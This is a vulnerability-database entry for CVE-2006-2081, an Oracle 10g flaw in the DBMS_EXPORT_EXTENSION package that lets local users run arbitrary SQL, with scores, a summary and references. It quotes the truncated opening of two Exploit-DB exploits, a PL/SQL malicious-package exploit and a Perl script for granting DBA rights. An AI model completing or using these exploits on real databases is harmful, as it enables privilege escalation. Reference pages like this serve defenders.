Vulmon Recent Vulnerabilities Research Posts Trends Blog About Contact
4.6
CVSSv2

CVE-2006-2081

Published: 27/04/2006 Updated: 18/10/2018
CVSS v2 Base Score: 4.6 | Impact Score: 6.4 | Exploitability Score: 3.9
VMScore: 470
Vector: AV:L/AC:L/Au:N/C:P/I:P/A:P
Subscribe to Oracle

Vulnerability Summary

Oracle Database Server 10g Release 2 allows local users to execute arbitrary SQL queries via the GET_DOMAIN_INDEX_METADATA function in the DBMS_EXPORT_EXTENSION package. NOTE: this issue was originally linked to DB05 (CVE-2006-1870), but a reliable third party has claimed that it is not the same issue. Based on details of the problem, the primary issue appears to be insecure privileges that facilitate the introduction of SQL in a way that is not related to special characters, so this is not "SQL injection" per se.

Vulnerable Product Search on Vulmon Subscribe to Product

oracle database server

Exploits

Exploit DB: Oracle 10g Release 2 - 'DBMS_EXPORT_EXTENSION' SQL
/* 0day, description is wrong /str0ke */ /* * Fucking NON-0 day($) exploit for Oracle 10g 102020 * * Patch your database now! * * by N1V1Hd $3c41r3 * */ CREATE OR REPLACE PACKAGE MYBADPACKAGE AUTHID CURRENT_USER IS FUNCTION ODCIIndexGetMetadata (oindexinfo SYSodciindexinfo,P3 VARCHAR2,p4 VARCHAR2,env SYSodcienv) RETURN NUMBER; END; / CREA ...
Exploit DB: Oracle 9i/10g - DBMS_EXPORT_EXTENSION SQL Injection
#!/usr/bin/perl # # Remote Oracle dbms_export_extension exploit (any version) # Grant or revoke dba permission to unprivileged user # # Tested on Oracle 10g - Release 102010 # Oracle 9i - Release 92020 # # REF: wwwsecurityfocuscom/bid/17699 # # AUTHOR: Andrea "bunker" Purificato # rawlabmindcreation ...

References

NVD-CWE-Otherhttp://www.red-database-security.com/exploits/oracle-sql-injection-oracle-dbms_export_extension.htmlhttp://www.kb.cert.org/vuls/id/932124http://www.securityfocus.com/bid/17699http://securitytracker.com/id?1015999http://secunia.com/advisories/19860http://securityreason.com/securityalert/802https://exchange.xforce.ibmcloud.com/vulnerabilities/26048http://www.securityfocus.com/archive/1/432632/30/5250/threadedhttp://www.securityfocus.com/archive/1/432355/100/0/threadedhttp://www.securityfocus.com/archive/1/432354/100/0/threadedhttp://www.securityfocus.com/archive/1/432078/100/0/threadedhttp://www.securityfocus.com/archive/1/431353/100/0/threadedhttps://nvd.nist.govhttps://www.exploit-db.com/exploits/1719/
CVSSv2
CVSSv2
CVSSv3
VMScore
Recommendations:
CVE-2024-27322administrator privilegesCVE-2024-1579hardcodedCVE-2023-20198CVE-2024-33587CVE-2024-33449CVE-2024-4308HTML injection
Vulnerability Notification Service
You don’t have to wait for vulnerability scanning results
Get Started

Vulmon Search

Vulmon Search is a vulnerability search engine. It gives comprehensive vulnerability information through a very simple user interface.

About

Home Recent Vulnerabilities Research Posts Trends Blog About Contact

Products

Vulmon Search Vulmon Research Vulmon Alerts Vulmap

Connect

Twitter Reddit Linkedin Facebook